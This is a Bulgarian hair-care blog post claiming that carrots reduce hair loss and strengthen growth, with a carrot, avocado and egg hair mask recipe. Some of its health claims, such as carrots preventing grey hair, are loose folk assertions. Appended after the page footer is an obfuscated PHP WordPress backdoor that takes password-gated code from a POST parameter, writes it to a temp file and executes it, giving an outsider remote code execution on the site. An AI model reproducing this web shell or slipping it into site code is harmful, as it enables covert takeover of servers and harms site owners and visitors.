Как морковите ни помагат срещу косопада и подсилват растежа на косата – Виж Тук: | Косопад

Как морковите ни помагат срещу косопада и подсилват растежа на косата – Виж Тук:

Косата, също като всяка друга част на тялото, има нужда от протеини, минерали, мазнини и витамини, за да е здрава.

Обикновено, се удължава с около сантиметър на година. Растежът зависи най- вече от нашето хранене. Колкото по- здравословно се храним, по- бързо расте косата.

Днес ще разгледаме един от най- типичните сезонни зеленчуци – морковът, и неговите полезни свойства за косъма. Ето кои са те:
– Съдържа витамини С и Е, които подобряват кръвообращението на скалпа. По този начин косъма се предпазва от преждевременна поява на бели коси.
– Морковите предпазват косата от агресивните външни фактори, като: замърсяване на околната среда, слънце, и пр.
– Морковите придават мек и блестящ вид на косъма, благодарение на съдържанието на витамини А, В1, В2, В6, С, Е, К, които подсилват корените.
– Помагат също за по- бързия растеж, заради високото съдържание на калий, фосфор и витамини. По този начин се стимулират косъма и корена и косопадът намалява.
– Освен за косата, морковът има отлично въздействие върху кожата и зрението. Подсилва и имунитета.
Ето как можем да използваме морковите за приготвяне на маска за коса:

МАСКА ОТ МОРКОВ, АВОКАДО И ЯЙЦЕ
Тази маска има отлично действие за възстановяването на косата. Авокадото позволява дълбокото хидратиране, докато яйцето осигурява съставки, които предпазват от въздействието на околната среда.
Съставки:
– ½ чаша сок от моркови
– 1 яйце (ако имате мазна коса, използвайте само белтъка)
– 1 авокадо

Как се приготвя:
В съд слагаме сока и разбитото яйце. Към тях добавяме меката част на авокадото. Разбиваме всичко, докато получим хомогенна смес.
Начин на прилагане:
Нанасяме сместа по цялата коса – от корена до върховете. Слагаме шапка за баня и спим така. Добре е да покрием възглавницата с кърпа, за да не протече.
На сутринта измиваме в шампоан.

04. октомври 2017 10:50:08 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}